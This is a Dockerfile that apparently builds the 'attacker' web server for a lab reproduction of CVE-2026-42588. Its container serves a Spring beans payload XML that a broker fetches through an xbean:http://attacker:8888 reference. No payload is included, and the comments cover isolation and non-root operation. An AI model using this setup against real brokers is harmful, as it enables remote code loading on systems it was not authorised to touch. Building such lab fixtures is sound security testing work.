# CVE-2026-42588 — attacker-controlled HTTP host
# Serves the Spring beans payload XML that the broker fetches via the
# xbean:http://attacker:8888/<file> reference. The served directory is a
# bind mount (env/attacker-www) the exploiter writes its payload into; no
# payload is baked into the image (exploit-agnostic).
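# Lab fixture base image. The tag is mutable; for reproducible lab builds pin
# it by digest (python:3.12-slim@sha256:<digest-placeholder>).
FROM python:3.12-slim

# /www is only the mount point for the bind-mounted content directory;
# nothing is copied into it at build time.
WORKDIR /www

# Documentation only: EXPOSE does not publish the port. Keep 8888 reachable
# solely from the isolated lab network and do not map it to a host interface.
EXPOSE 8888

# A static file server only needs read access to /www, so drop root before
# the process starts. 65534 is the stock "nobody" uid/gid on Debian-based
# images; the bind-mounted directory and its files must be readable by
# "other" for the server to serve them.
USER 65534:65534

# Plain static file server over the bind-mounted /www directory.
# Binding 0.0.0.0 lets other containers on the lab network connect.
# http.server has no authentication or TLS and lists directory contents when
# no index file is present, so treat everything placed in /www as readable by
# anything that can reach this container.
CMD ["python3", "-m", "http.server", "8888", "--bind", "0.0.0.0", "--directory", "/www"]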
